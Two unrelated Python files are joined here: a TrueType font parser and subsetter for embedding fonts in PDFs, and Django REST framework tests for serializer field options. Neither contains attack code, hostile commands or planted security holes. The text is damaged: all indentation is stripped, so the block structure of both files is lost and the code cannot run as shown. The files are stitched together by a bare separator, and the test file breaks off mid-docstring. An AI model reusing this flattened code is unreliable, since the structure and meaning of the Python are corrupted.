write(pack(">lHHHH", 0x00010000, numTables, searchRange,
entrySelector, rangeShift))
# Table directory
tables = self.tables.items()
tables.sort() # XXX is this the correct order?
offset = 12 + numTables * 16
for tag, data in tables:
if tag == 'head':
head_start = offset
checksum = calcChecksum(data)
write(tag)
write(pack(">LLL", checksum, offset, len(data)))
paddedLength = (len(data)+3)&~3
offset = offset + paddedLength
# Table data
for tag, data in tables:
data += "\0\0\0"
write(data[:len(data)&~3])
checksum = calcChecksum(stm.getvalue())
checksum = add32(0xB1B0AFBAL, -checksum)
stm.seek(head_start + 8)
write(pack('>L', checksum))
return stm.getvalue()
class TTFontFile(TTFontParser):
"TTF file parser and generator"
def __init__(self, file, charInfo=1, validate=0,subfontIndex=0):
"""Loads and parses a TrueType font file.
file can be a filename or a file object. If validate is set to a false
values, skips checksum validation. This can save time, especially if
the font is large. See TTFontFile.extractInfo for more information.
"""
TTFontParser.__init__(self, file, validate=validate,subfontIndex=subfontIndex)
self.extractInfo(charInfo)
def extractInfo(self, charInfo=1):
"""
Extract typographic information from the loaded font file.
The following attributes will be set::
name PostScript font name
flags Font flags
ascent Typographic ascender in 1/1000ths of a point
descent Typographic descender in 1/1000ths of a point
capHeight Cap height in 1/1000ths of a point (0 if not available)
bbox Glyph bounding box [l,t,r,b] in 1/1000ths of a point
_bbox Glyph bounding box [l,t,r,b] in unitsPerEm
unitsPerEm Glyph units per em
italicAngle Italic angle in degrees ccw
stemV stem weight in 1/1000ths of a point (approximate)
If charInfo is true, the following will also be set::
defaultWidth default glyph width in 1/1000ths of a point
charWidths dictionary of character widths for every supported UCS character
code
This will only work if the font has a Unicode cmap (platform 3,
encoding 1, format 4 or platform 0 any encoding format 4). Setting
charInfo to false avoids this requirement
"""
# name - Naming table
name_offset = self.seek_table("name")
format = self.read_ushort()
if format != 0:
raise TTFError, "Unknown name table format (%d)" % format
numRecords = self.read_ushort()
string_data_offset = name_offset + self.read_ushort()
names = {1:None,2:None,3:None,4:None,6:None}
K = names.keys()
nameCount = len(names)
for i in xrange(numRecords):
platformId = self.read_ushort()
encodingId = self.read_ushort()
languageId = self.read_ushort()
nameId = self.read_ushort()
length = self.read_ushort()
offset = self.read_ushort()
if nameId not in K: continue
N = None
if platformId == 3 and encodingId == 1 and languageId == 0x409: # Microsoft, Unicode, US English, PS Name
opos = self._pos
try:
self.seek(string_data_offset + offset)
if length % 2 != 0:
raise TTFError, "PostScript name is UTF-16BE string of odd length"
length /= 2
N = []
A = N.append
while length > 0:
char = self.read_ushort()
A(chr(char))
length -= 1
N = ''.join(N)
finally:
self._pos = opos
elif platformId == 1 and encodingId == 0 and languageId == 0: # Macintosh, Roman, English, PS Name
# According to OpenType spec, if PS name exists, it must exist
# both in MS Unicode and Macintosh Roman formats. Apparently,
# you can find live TTF fonts which only have Macintosh format.
N = self.get_chunk(string_data_offset + offset, length)
if N and names[nameId]==None:
names[nameId] = N
nameCount -= 1
if nameCount==0: break
if names[6] is not None:
psName = names[6].replace(" ", "-") #Dinu Gherman's fix for font names with spaces
elif names[4] is not None:
psName = names[4].replace(" ", "-")
# Fine, one last try before we bail.
elif names[1] is not None:
psName = names[1].replace(" ", "-")
else:
psName = None
# Don't just assume, check for None since some shoddy fonts cause crashes here...
if not psName:
raise TTFError, "Could not find PostScript font name"
for c in psName:
oc = ord(c)
if oc>126 or c in ' [](){}<>/%':
raise TTFError, "psName=%r contains invalid character '%s' ie U+%04X" % (psName,c,ord(c))
self.name = psName
self.familyName = names[1] or psName
self.styleName = names[2] or 'Regular'
self.fullName = names[4] or psName
self.uniqueFontID = names[3] or psName
# head - Font header table
self.seek_table("head")
ver_maj, ver_min = self.read_ushort(), self.read_ushort()
if ver_maj != 1:
raise TTFError, 'Unknown head table version %d.%04x' % (ver_maj, ver_min)
self.fontRevision = self.read_ushort(), self.read_ushort()
self.skip(4)
magic = self.read_ulong()
if magic != 0x5F0F3CF5:
raise TTFError, 'Invalid head table magic %04x' % magic
self.skip(2)
self.unitsPerEm = unitsPerEm = self.read_ushort()
scale = lambda x, unitsPerEm=unitsPerEm: x * 1000. / unitsPerEm
self.skip(16)
xMin = self.read_short()
yMin = self.read_short()
xMax = self.read_short()
yMax = self.read_short()
self.bbox = map(scale, [xMin, yMin, xMax, yMax])
self.skip(3*2)
indexToLocFormat = self.read_ushort()
glyphDataFormat = self.read_ushort()
# OS/2 - OS/2 and Windows metrics table
# (needs data from head table)
if "OS/2" in self.table:
self.seek_table("OS/2")
version = self.read_ushort()
self.skip(2)
usWeightClass = self.read_ushort()
self.skip(2)
fsType = self.read_ushort()
if fsType == 0x0002 or (fsType & 0x0300) != 0:
raise TTFError, 'Font does not allow subsetting/embedding (%04X)' % fsType
self.skip(58) #11*2 + 10 + 4*4 + 4 + 3*2
sTypoAscender = self.read_short()
sTypoDescender = self.read_short()
self.ascent = scale(sTypoAscender) # XXX: for some reason it needs to be multiplied by 1.24--1.28
self.descent = scale(sTypoDescender)
if version > 1:
self.skip(16) #3*2 + 2*4 + 2
sCapHeight = self.read_short()
self.capHeight = scale(sCapHeight)
else:
self.capHeight = self.ascent
else:
# Microsoft TTFs require an OS/2 table; Apple ones do not. Try to
# cope. The data is not very important anyway.
usWeightClass = 500
self.ascent = scale(yMax)
self.descent = scale(yMin)
self.capHeight = self.ascent
# There's no way to get stemV from a TTF file short of analyzing actual outline data
# This fuzzy formula is taken from pdflib sources, but we could just use 0 here
self.stemV = 50 + int((usWeightClass / 65.0) ** 2)
# post - PostScript table
# (needs data from OS/2 table)
self.seek_table("post")
ver_maj, ver_min = self.read_ushort(), self.read_ushort()
if ver_maj not in (1, 2, 3, 4):
# Adobe/MS documents 1, 2, 2.5, 3; Apple also has 4.
# From Apple docs it seems that we do not need to care
# about the exact version, so if you get this error, you can
# try to remove this check altogether.
raise TTFError, 'Unknown post table version %d.%04x' % (ver_maj, ver_min)
self.italicAngle = self.read_short() + self.read_ushort() / 65536.0
self.underlinePosition = self.read_short()
self.underlineThickness = self.read_short()
isFixedPitch = self.read_ulong()
self.flags = FF_SYMBOLIC # All fonts that contain characters
# outside the original Adobe character
# set are considered "symbolic".
if self.italicAngle!= 0:
self.flags = self.flags | FF_ITALIC
if usWeightClass >= 600: # FW_REGULAR == 500, FW_SEMIBOLD == 600
self.flags = self.flags | FF_FORCEBOLD
if isFixedPitch:
self.flags = self.flags | FF_FIXED
# XXX: FF_SERIF? FF_SCRIPT? FF_ALLCAP? FF_SMALLCAP?
# hhea - Horizontal header table
self.seek_table("hhea")
ver_maj, ver_min = self.read_ushort(), self.read_ushort()
if ver_maj != 1:
raise TTFError, 'Unknown hhea table version %d.%04x' % (ver_maj, ver_min)
self.skip(28)
metricDataFormat = self.read_ushort()
if metricDataFormat != 0:
raise TTFError, 'Unknown horizontal metric data format (%d)' % metricDataFormat
numberOfHMetrics = self.read_ushort()
if numberOfHMetrics == 0:
raise TTFError, 'Number of horizontal metrics is 0'
# maxp - Maximum profile table
self.seek_table("maxp")
ver_maj, ver_min = self.read_ushort(), self.read_ushort()
if ver_maj != 1:
raise TTFError, 'Unknown maxp table version %d.%04x' % (ver_maj, ver_min)
numGlyphs = self.read_ushort()
if not charInfo:
self.charToGlyph = None
self.defaultWidth = None
self.charWidths = None
return
if glyphDataFormat != 0:
raise TTFError, 'Unknown glyph data format (%d)' % glyphDataFormat
# cmap - Character to glyph index mapping table
cmap_offset = self.seek_table("cmap")
self.skip(2)
cmapTableCount = self.read_ushort()
unicode_cmap_offset = None
for n in xrange(cmapTableCount):
platformID = self.read_ushort()
encodingID = self.read_ushort()
offset = self.read_ulong()
if platformID == 3 and encodingID == 1: # Microsoft, Unicode
format = self.get_ushort(cmap_offset + offset)
if format == 4:
unicode_cmap_offset = cmap_offset + offset
break
elif platformID == 0: # Unicode -- assume all encodings are compatible
format = self.get_ushort(cmap_offset + offset)
if format == 4:
unicode_cmap_offset = cmap_offset + offset
break
if unicode_cmap_offset is None:
raise TTFError, 'Font does not have cmap for Unicode (platform 3, encoding 1, format 4 or platform 0 any encoding format 4)'
self.seek(unicode_cmap_offset + 2)
length = self.read_ushort()
limit = unicode_cmap_offset + length
self.skip(2)
segCount = int(self.read_ushort() / 2.0)
self.skip(6)
endCount = map(lambda x, self=self: self.read_ushort(), xrange(segCount))
self.skip(2)
startCount = map(lambda x, self=self: self.read_ushort(), xrange(segCount))
idDelta = map(lambda x, self=self: self.read_short(), xrange(segCount))
idRangeOffset_start = self._pos
idRangeOffset = map(lambda x, self=self: self.read_ushort(), xrange(segCount))
# Now it gets tricky.
glyphToChar = {}
charToGlyph = {}
for n in xrange(segCount):
for unichar in xrange(startCount[n], endCount[n] + 1):
if idRangeOffset[n] == 0:
glyph = (unichar + idDelta[n]) & 0xFFFF
else:
offset = (unichar - startCount[n]) * 2 + idRangeOffset[n]
offset = idRangeOffset_start + 2 * n + offset
if offset >= limit:
# workaround for broken fonts (like Thryomanes)
glyph = 0
else:
glyph = self.get_ushort(offset)
if glyph != 0:
glyph = (glyph + idDelta[n]) & 0xFFFF
charToGlyph[unichar] = glyph
if glyph in glyphToChar:
glyphToChar[glyph].append(unichar)
else:
glyphToChar[glyph] = [unichar]
self.charToGlyph = charToGlyph
# hmtx - Horizontal metrics table
# (needs data from hhea, maxp, and cmap tables)
self.seek_table("hmtx")
aw = None
self.charWidths = {}
self.hmetrics = []
for glyph in xrange(numberOfHMetrics):
# advance width and left side bearing. lsb is actually signed
# short, but we don't need it anyway (except for subsetting)
aw, lsb = self.read_ushort(), self.read_ushort()
self.hmetrics.append((aw, lsb))
aw = scale(aw)
if glyph == 0:
self.defaultWidth = aw
if glyph in glyphToChar:
for char in glyphToChar[glyph]:
self.charWidths[char] = aw
for glyph in xrange(numberOfHMetrics, numGlyphs):
# the rest of the table only lists advance left side bearings.
# so we reuse aw set by the last iteration of the previous loop
lsb = self.read_ushort()
self.hmetrics.append((aw, lsb))
if glyph in glyphToChar:
for char in glyphToChar[glyph]:
self.charWidths[char] = aw
# loca - Index to location
self.seek_table('loca')
self.glyphPos = []
if indexToLocFormat == 0:
for n in xrange(numGlyphs + 1):
self.glyphPos.append(self.read_ushort() << 1)
elif indexToLocFormat == 1:
for n in xrange(numGlyphs + 1):
self.glyphPos.append(self.read_ulong())
else:
raise TTFError, 'Unknown location table format (%d)' % indexToLocFormat
# Subsetting
def makeSubset(self, subset):
"""Create a subset of a TrueType font"""
output = TTFontMaker()
# Build a mapping of glyphs in the subset to glyph numbers in
# the original font. Also build a mapping of UCS codes to
# glyph values in the new font.
# Start with 0 -> 0: "missing character"
glyphMap = [0] # new glyph index -> old glyph index
glyphSet = {0:0} # old glyph index -> new glyph index
codeToGlyph = {} # unicode -> new glyph index
for code in subset:
if code in self.charToGlyph:
originalGlyphIdx = self.charToGlyph[code]
else:
originalGlyphIdx = 0
if originalGlyphIdx not in glyphSet:
glyphSet[originalGlyphIdx] = len(glyphMap)
glyphMap.append(originalGlyphIdx)
codeToGlyph[code] = glyphSet[originalGlyphIdx]
# Also include glyphs that are parts of composite glyphs
start = self.get_table_pos('glyf')[0]
n = 0
while n < len(glyphMap):
originalGlyphIdx = glyphMap[n]
glyphPos = self.glyphPos[originalGlyphIdx]
glyphLen = self.glyphPos[originalGlyphIdx + 1] - glyphPos
n += 1
if not glyphLen: continue
self.seek(start + glyphPos)
numberOfContours = self.read_short()
if numberOfContours < 0:
# composite glyph
self.skip(8)
flags = GF_MORE_COMPONENTS
while flags & GF_MORE_COMPONENTS:
flags = self.read_ushort()
glyphIdx = self.read_ushort()
if glyphIdx not in glyphSet:
glyphSet[glyphIdx] = len(glyphMap)
glyphMap.append(glyphIdx)
if flags & GF_ARG_1_AND_2_ARE_WORDS:
self.skip(4)
else:
self.skip(2)
if flags & GF_WE_HAVE_A_SCALE:
self.skip(2)
elif flags & GF_WE_HAVE_AN_X_AND_Y_SCALE:
self.skip(4)
elif flags & GF_WE_HAVE_A_TWO_BY_TWO:
self.skip(8)
numGlyphs = n = len(glyphMap)
while n > 1 and self.hmetrics[n][0] == self.hmetrics[n - 1][0]:
n -= 1
numberOfHMetrics = n
# The following tables are simply copied from the original
for tag in ('name', 'OS/2', 'cvt ', 'fpgm', 'prep'):
try:
output.add(tag, self.get_table(tag))
except KeyError:
# Apparently some of the tables are optional (cvt, fpgm, prep).
# The lack of the required ones (name, OS/2) would have already
# been caught before.
pass
# post - PostScript
post = "\x00\x03\x00\x00" + self.get_table('post')[4:16] + "\x00" * 16
output.add('post', post)
# hhea - Horizontal Header
hhea = self.get_table('hhea')
hhea = _set_ushort(hhea, 34, numberOfHMetrics)
output.add('hhea', hhea)
# maxp - Maximum Profile
maxp = self.get_table('maxp')
maxp = _set_ushort(maxp, 4, numGlyphs)
output.add('maxp', maxp)
# cmap - Character to glyph mapping
# XXX maybe use format 0 if possible, not 6?
entryCount = len(subset)
length = 10 + entryCount * 2
cmap = [0, 1, # version, number of tables
1, 0, 0,12, # platform, encoding, offset (hi,lo)
6, length, 0, # format, length, language
0,
entryCount] + \
map(codeToGlyph.get, subset)
cmap = pack(*([">%dH" % len(cmap)] + cmap))
output.add('cmap', cmap)
# hmtx - Horizontal Metrics
hmtx = []
for n in xrange(numGlyphs):
originalGlyphIdx = glyphMap[n]
aw, lsb = self.hmetrics[originalGlyphIdx]
if n < numberOfHMetrics:
hmtx.append(int(aw))
hmtx.append(int(lsb))
hmtx = pack(*([">%dH" % len(hmtx)] + hmtx))
output.add('hmtx', hmtx)
# glyf - Glyph data
glyphData = self.get_table('glyf')
offsets = []
glyf = []
pos = 0
for n in xrange(numGlyphs):
offsets.append(pos)
originalGlyphIdx = glyphMap[n]
glyphPos = self.glyphPos[originalGlyphIdx]
glyphLen = self.glyphPos[originalGlyphIdx + 1] - glyphPos
data = glyphData[glyphPos:glyphPos+glyphLen]
# Fix references in composite glyphs
if glyphLen > 2 and unpack(">h", data[:2])[0] < 0:
# composite glyph
pos_in_glyph = 10
flags = GF_MORE_COMPONENTS
while flags & GF_MORE_COMPONENTS:
flags = unpack(">H", data[pos_in_glyph:pos_in_glyph+2])[0]
glyphIdx = unpack(">H", data[pos_in_glyph+2:pos_in_glyph+4])[0]
data = _set_ushort(data, pos_in_glyph + 2, glyphSet[glyphIdx])
pos_in_glyph = pos_in_glyph + 4
if flags & GF_ARG_1_AND_2_ARE_WORDS:
pos_in_glyph = pos_in_glyph + 4
else:
pos_in_glyph = pos_in_glyph + 2
if flags & GF_WE_HAVE_A_SCALE:
pos_in_glyph = pos_in_glyph + 2
elif flags & GF_WE_HAVE_AN_X_AND_Y_SCALE:
pos_in_glyph = pos_in_glyph + 4
elif flags & GF_WE_HAVE_A_TWO_BY_TWO:
pos_in_glyph = pos_in_glyph + 8
glyf.append(data)
pos = pos + glyphLen
if pos % 4 != 0:
padding = 4 - pos % 4
glyf.append('\0' * padding)
pos = pos + padding
offsets.append(pos)
output.add('glyf', string.join(glyf, ""))
# loca - Index to location
loca = []
if (pos + 1) >> 1 > 0xFFFF:
indexToLocFormat = 1 # long format
for offset in offsets:
loca.append(offset)
loca = pack(*([">%dL" % len(loca)] + loca))
else:
indexToLocFormat = 0 # short format
for offset in offsets:
loca.append(offset >> 1)
loca = pack(*([">%dH" % len(loca)] + loca))
output.add('loca', loca)
# head - Font header
head = self.get_table('head')
head = _set_ushort(head, 50, indexToLocFormat)
output.add('head', head)
return output.makeStream()
#
# TrueType font embedding
#
# PDF font flags (see PDF Reference Guide table 5.19)
FF_FIXED = 1 << 1-1
FF_SERIF = 1 << 2-1
FF_SYMBOLIC = 1 << 3-1
FF_SCRIPT = 1 << 4-1
FF_NONSYMBOLIC = 1 << 6-1
FF_ITALIC = 1 << 7-1
FF_ALLCAP = 1 << 17-1
FF_SMALLCAP = 1 << 18-1
FF_FORCEBOLD = 1 << 19-1
class TTFontFace(TTFontFile, pdfmetrics.TypeFace):
"""TrueType typeface.
Conceptually similar to a single byte typeface, but the glyphs are
identified by UCS character codes instead of glyph names."""
def __init__(self, filename, validate=0, subfontIndex=0):
"Loads a TrueType font from filename."
pdfmetrics.TypeFace.__init__(self, None)
TTFontFile.__init__(self, filename, validate=validate, subfontIndex=subfontIndex)
def getCharWidth(self, code):
"Returns the width of character U+<code>"
return self.charWidths.get(code, self.defaultWidth)
def addSubsetObjects(self, doc, fontname, subset):
"""Generate a TrueType font subset and add it to the PDF document.
Returns a PDFReference to the new FontDescriptor object."""
fontFile = pdfdoc.PDFStream()
fontFile.content = self.makeSubset(subset)
fontFile.dictionary['Length1'] = len(fontFile.content)
if doc.compression:
fontFile.filters = [pdfdoc.PDFZCompress]
fontFileRef = doc.Reference(fontFile, 'fontFile:%s(%s)' % (self.filename, fontname))
flags = self.flags & ~ FF_NONSYMBOLIC
flags = flags | FF_SYMBOLIC
fontDescriptor = pdfdoc.PDFDictionary({
'Type': '/FontDescriptor',
'Ascent': self.ascent,
'CapHeight': self.capHeight,
'Descent': self.descent,
'Flags': flags,
'FontBBox': pdfdoc.PDFArray(self.bbox),
'FontName': pdfdoc.PDFName(fontname),
'ItalicAngle': self.italicAngle,
'StemV': self.stemV,
'FontFile2': fontFileRef,
})
return doc.Reference(fontDescriptor, 'fontDescriptor:' + fontname)
class TTEncoding:
"""Encoding for TrueType fonts (always UTF-8).
TTEncoding does not directly participate in PDF object creation, since
we need a number of different 8-bit encodings for every generated font
subset. TTFont itself cares about that."""
def __init__(self):
self.name = "UTF-8"
class TTFont:
"""Represents a TrueType font.
Its encoding is always UTF-8.
Note: you cannot use the same TTFont object for different documents
at the same time.
Example of usage:
font = ttfonts.TTFont('PostScriptFontName', '/path/to/font.ttf')
pdfmetrics.registerFont(font)
canvas.setFont('PostScriptFontName', size)
canvas.drawString(x, y, "Some text encoded in UTF-8")
"""
class State:
namePrefix = 'F'
def __init__(self,asciiReadable=None):
self.assignments = {}
self.nextCode = 0
self.internalName = None
self.frozen = 0
if asciiReadable is None:
asciiReadable = rl_config.ttfAsciiReadable
if asciiReadable:
# Let's add the first 128 unicodes to the 0th subset, so ' '
# always has code 32 (for word spacing to work) and the ASCII
# output is readable
subset0 = range(128)
self.subsets = [subset0]
for n in subset0:
self.assignments[n] = n
self.nextCode = 128
else:
self.subsets = [[32]*33]
self.assignments[32] = 32
_multiByte = 1 # We want our own stringwidth
_dynamicFont = 1 # We want dynamic subsetting
def __init__(self, name, filename, validate=0, subfontIndex=0,asciiReadable=None):
"""Loads a TrueType font from filename.
If validate is set to a false values, skips checksum validation. This
can save time, especially if the font is large.
"""
self.fontName = name
self.face = TTFontFace(filename, validate=validate, subfontIndex=subfontIndex)
self.encoding = TTEncoding()
from weakref import WeakKeyDictionary
self.state = WeakKeyDictionary()
if asciiReadable is None:
asciiReadable = rl_config.ttfAsciiReadable
self._asciiReadable = asciiReadable
def _py_stringWidth(self, text, size, encoding='utf-8'):
"Calculate text width"
if not isinstance(text,unicode):
text = unicode(text, encoding or 'utf-8') # encoding defaults to utf-8
g = self.face.charWidths.get
dw = self.face.defaultWidth
return 0.001*size*sum([g(ord(u),dw) for u in text])
stringWidth = _py_stringWidth
def _assignState(self,doc,asciiReadable=None,namePrefix=None):
'''convenience function for those wishing to roll their own state properties'''
if asciiReadable is None:
asciiReadable = self._asciiReadable
try:
state = self.state[doc]
except KeyError:
state = self.state[doc] = TTFont.State(asciiReadable)
if namePrefix is not None:
state.namePrefix = namePrefix
return state
def splitString(self, text, doc, encoding='utf-8'):
"""Splits text into a number of chunks, each of which belongs to a
single subset. Returns a list of tuples (subset, string). Use subset
numbers with getSubsetInternalName. Doc is needed for distinguishing
subsets when building different documents at the same time."""
asciiReadable = self._asciiReadable
try: state = self.state[doc]
except KeyError: state = self.state[doc] = TTFont.State(asciiReadable)
curSet = -1
cur = []
results = []
if not isinstance(text,unicode):
text = unicode(text, encoding or 'utf-8') # encoding defaults to utf-8
assignments = state.assignments
subsets = state.subsets
for code in map(ord,text):
if code in assignments:
n = assignments[code]
else:
if state.frozen:
raise pdfdoc.PDFError, "Font %s is already frozen, cannot add new character U+%04X" % (self.fontName, code)
n = state.nextCode
if n&0xFF==32:
# make code 32 always be a space character
if n!=32: subsets[n >> 8].append(32)
state.nextCode += 1
n = state.nextCode
state.nextCode += 1
assignments[code] = n
if n>32:
if not(n&0xFF): subsets.append([])
subsets[n >> 8].append(code)
else:
subsets[0][n] = code
if (n >> 8) != curSet:
if cur:
results.append((curSet, ''.join(map(chr,cur))))
curSet = (n >> 8)
cur = []
cur.append(n & 0xFF)
if cur:
results.append((curSet,''.join(map(chr,cur))))
return results
def getSubsetInternalName(self, subset, doc):
"""Returns the name of a PDF Font object corresponding to a given
subset of this dynamic font. Use this function instead of
PDFDocument.getInternalFontName."""
try: state = self.state[doc]
except KeyError: state = self.state[doc] = TTFont.State(self._asciiReadable)
if subset < 0 or subset >= len(state.subsets):
raise IndexError, 'Subset %d does not exist in font %s' % (subset, self.fontName)
if state.internalName is None:
state.internalName = state.namePrefix +repr(len(doc.fontMapping) + 1)
doc.fontMapping[self.fontName] = '/' + state.internalName
doc.delayedFonts.append(self)
return '/%s+%d' % (state.internalName, subset)
def addObjects(self, doc):
"""Makes one or more PDF objects to be added to the document. The
caller supplies the internal name to be used (typically F1, F2, ... in
sequence).
This method creates a number of Font and FontDescriptor objects. Every
FontDescriptor is a (no more than) 256 character subset of the original
TrueType font."""
try: state = self.state[doc]
except KeyError: state = self.state[doc] = TTFont.State(self._asciiReadable)
state.frozen = 1
for n,subset in enumerate(state.subsets):
internalName = self.getSubsetInternalName(n, doc)[1:]
baseFontName = "%s+%s%s" % (SUBSETN(n),self.face.name,self.face.subfontNameX)
pdfFont = pdfdoc.PDFTrueTypeFont()
pdfFont.__Comment__ = 'Font %s subset %d' % (self.fontName, n)
pdfFont.Name = internalName
pdfFont.BaseFont = baseFontName
pdfFont.FirstChar = 0
pdfFont.LastChar = len(subset) - 1
widths = map(self.face.getCharWidth, subset)
pdfFont.Widths = pdfdoc.PDFArray(widths)
cmapStream = pdfdoc.PDFStream()
cmapStream.content = makeToUnicodeCMap(baseFontName, subset)
if doc.compression:
cmapStream.filters = [pdfdoc.PDFZCompress]
pdfFont.ToUnicode = doc.Reference(cmapStream, 'toUnicodeCMap:' + baseFontName)
pdfFont.FontDescriptor = self.face.addSubsetObjects(doc, baseFontName, subset)
# link it in
ref = doc.Reference(pdfFont, internalName)
fontDict = doc.idToObject['BasicFonts'].dict
fontDict[internalName] = pdfFont
del self.state[doc]
try:
from _rl_accel import _instanceStringWidthTTF
import new
TTFont.stringWidth = new.instancemethod(_instanceStringWidthTTF,None,TTFont)
except ImportError:
pass
| |
from decimal import Decimal
from django.utils import timezone
from rest_framework import serializers
import rest_framework
import datetime
import django
import pytest
import uuid
# Tests for field keyword arguments and core functionality.
# ---------------------------------------------------------
class TestEmpty:
"""
Tests for `required`, `allow_null`, `allow_blank`, `default`.
"""
def test_required(self):
"""
By default a field must be included in the input.
"""
field = serializers.IntegerField()
with pytest.raises(serializers.ValidationError) as exc_info:
field.run_validation()
assert exc_info.value.detail == ['This field is required.']
def test_not_required(self):
"""
If `required=False` then a field may be omitted from the input.
"""
field = serializers.IntegerField(required=False)
with pytest.raises(serializers.SkipField):
field.run_validation()
def test_disallow_null(self):
"""
By default `None` is not a valid input.
"""
field = serializers.IntegerField()
with pytest.raises(serializers.ValidationError) as exc_info:
field.run_validation(None)
assert exc_info.value.detail == ['This field may not be null.']
def test_allow_null(self):
"""
If `allow_null=True` then `None` is a valid input.
"""
field = serializers.IntegerField(allow_null=True)
output = field.run_validation(None)
assert output is None
def test_disallow_blank(self):
"""
By default '' is not a valid input.
"""
field = serializers.CharField()
with pytest.raises(serializers.ValidationError) as exc_info:
field.run_validation('')
assert exc_info.value.detail == ['This field may not be blank.']
def test_allow_blank(self):
"""
If `allow_blank=True` then '' is a valid input.
"""
field = serializers.CharField(allow_blank=True)
output = field.run_validation('')
assert output == ''
def test_default(self):
"""
If `default` is set, then omitted values get the default input.
"""
field = serializers.IntegerField(default=123)
output = field.run_validation()
assert output is 123
class TestSource:
def test_source(self):
class ExampleSerializer(serializers.Serializer):
example_field = serializers.CharField(source='other')
serializer = ExampleSerializer(data={'example_field': 'abc'})
assert serializer.is_valid()
assert serializer.validated_data == {'other': 'abc'}
def test_redundant_source(self):
class ExampleSerializer(serializers.Serializer):
example_field = serializers.CharField(source='example_field')
with pytest.raises(AssertionError) as exc_info:
ExampleSerializer().fields
assert str(exc_info.value) == (
"It is redundant to specify `source='example_field'` on field "
"'CharField' in serializer 'ExampleSerializer', because it is the "
"same as the field name. Remove the `source` keyword argument."
)
def test_callable_source(self):
class ExampleSerializer(serializers.Serializer):
example_field = serializers.CharField(source='example_callable')
class ExampleInstance(object):
def example_callable(self):
return 'example callable value'
serializer = ExampleSerializer(ExampleInstance())
assert serializer.data['example_field'] == 'example callable value'
def test_callable_source_raises(self):
class ExampleSerializer(serializers.Serializer):
example_field = serializers.CharField(source='example_callable', read_only=True)
class ExampleInstance(object):
def example_callable(self):
raise AttributeError('method call failed')
with pytest.raises(ValueError) as exc_info:
serializer = ExampleSerializer(ExampleInstance())
serializer.data.items()
assert 'method call failed' in str(exc_info.value)
class TestReadOnly:
def setup(self):
class TestSerializer(serializers.Serializer):
read_only = serializers.ReadOnlyField()
writable = serializers.IntegerField()
self.Serializer = TestSerializer
def test_validate_read_only(self):
"""
Read-only serializers.should not be included in validation.
"""
data = {'read_only': 123, 'writable': 456}
serializer = self.Serializer(data=data)
assert serializer.is_valid()
assert serializer.validated_data == {'writable': 456}
def test_serialize_read_only(self):
"""
Read-only serializers.should be serialized.
"""
instance = {'read_only': 123, 'writable': 456}
serializer = self.Serializer(instance)
assert serializer.data == {'read_only': 123, 'writable': 456}
class TestWriteOnly:
def setup(self):
class TestSerializer(serializers.Serializer):
write_only = serializers.IntegerField(write_only=True)
readable = serializers.IntegerField()
self.Serializer = TestSerializer
def test_validate_write_only(self):
"""
Write-only serializers.should be included in validation.
"""
data = {'write_only': 123, 'readable': 456}
serializer = self.Serializer(data=data)
assert serializer.is_valid()
assert serializer.validated_data == {'write_only': 123, 'readable': 456}
def test_serialize_write_only(self):
"""
Write-only serializers.should not be serialized.
"""
instance = {'write_only': 123, 'readable': 456}
serializer = self.Serializer(instance)
assert serializer.data == {'readable': 456}
class TestInitial:
def setup(self):
class TestSerializer(serializers.Serializer):
initial_field = serializers.IntegerField(initial=123)
blank_field = serializers.IntegerField()
self.serializer = TestSerializer()
def test_initial(self):
"""
Initial values should be included when serializing a new representation.
"""
assert self.serializer.data == {
'initial_field': 123,
'blank_field': None
}
class TestLabel:
def setup(self):
class TestSerializer(serializers.Serializer):
labeled = serializers.IntegerField(label='My label')
self.serializer = TestSerializer()
def test_label(self):
"""
A field's label may be set with the `label` argument.
"""
fields = self.serializer.fields
assert fields['labeled'].label == 'My label'
class TestInvalidErrorKey:
def setup(self):
class ExampleField(serializers.Field):
def to_native(self, data):
self.fail('incorrect')
self.field = ExampleField()
def test_invalid_error_key(self):
"""
If a field raises a validation error, but does not have a corresponding
error message, then raise an appropriate assertion error.
"""
with pytest.raises(AssertionError) as exc_info:
self.field.to_native(123)
expected = (
'ValidationError raised by `ExampleField`, but error key '
'`incorrect` does not exist in the `error_messages` dictionary.'
)
assert str(exc_info.value) == expected
class MockHTMLDict(dict):
"""
This class mocks up a dictionary like object, that behaves
as if it was returned for multipart or urlencoded data.
"""
getlist = None
class TestBooleanHTMLInput:
def setup(self):
class TestSerializer(serializers.Serializer):
archived = serializers.BooleanField()
self.Serializer = TestSerializer
def test_empty_html_checkbox(self):
"""
HTML checkboxes do not send any value, but should be treated
as `False` by BooleanField.
"""
# This class mocks up a dictionary like object, that behaves
# as if it was returned for multipart or urlencoded data.
serializer = self.Serializer(data=MockHTMLDict())
assert serializer.is_valid()
assert serializer.validated_data == {'archived': False}
class TestHTMLInput:
def test_empty_html_charfield(self):
class TestSerializer(serializers.Serializer):
message = serializers.CharField(default='happy')
serializer = TestSerializer(data=MockHTMLDict())
assert serializer.is_valid()
assert serializer.validated_data == {'message': 'happy'}
def test_empty_html_charfield_allow_null(self):
class TestSerializer(serializers.Serializer):
message = serializers.CharField(allow_null=True)
serializer = TestSerializer(data=MockHTMLDict({'message': ''}))
assert serializer.is_valid()
assert serializer.validated_data == {'message': None}
def test_empty_html_datefield_allow_null(self):
class TestSerializer(serializers.Serializer):
expiry = serializers.DateField(allow_null=True)
serializer = TestSerializer(data=MockHTMLDict({'expiry': ''}))
assert serializer.is_valid()
assert serializer.validated_data == {'expiry': None}
def test_empty_html_charfield_allow_null_allow_blank(self):
class TestSerializer(serializers.Serializer):
message = serializers.CharField(allow_null=True, allow_blank=True)
serializer = TestSerializer(data=MockHTMLDict({'message': ''}))
assert serializer.is_valid()
assert serializer.validated_data == {'message': ''}
def test_empty_html_charfield_required_false(self):
class TestSerializer(serializers.Serializer):
message = serializers.CharField(required=False)
serializer = TestSerializer(data=MockHTMLDict())
assert serializer.is_valid()
assert serializer.validated_data == {}
class TestCreateOnlyDefault:
def setup(self):
default = serializers.CreateOnlyDefault('2001-01-01')
class TestSerializer(serializers.Serializer):
published = serializers.HiddenField(default=default)
text = serializers.CharField()
self.Serializer = TestSerializer
def test_create_only_default_is_provided(self):
serializer = self.Serializer(data={'text': 'example'})
assert serializer.is_valid()
assert serializer.validated_data == {
'text': 'example', 'published': '2001-01-01'
}
def test_create_only_default_is_not_provided_on_update(self):
instance = {
'text': 'example', 'published': '2001-01-01'
}
serializer = self.Serializer(instance, data={'text': 'example'})
assert serializer.is_valid()
assert serializer.validated_data == {
'text': 'example',
}
def test_create_only_default_callable_sets_context(self):
"""
CreateOnlyDefault instances with a callable default should set_context
on the callable if possible
"""
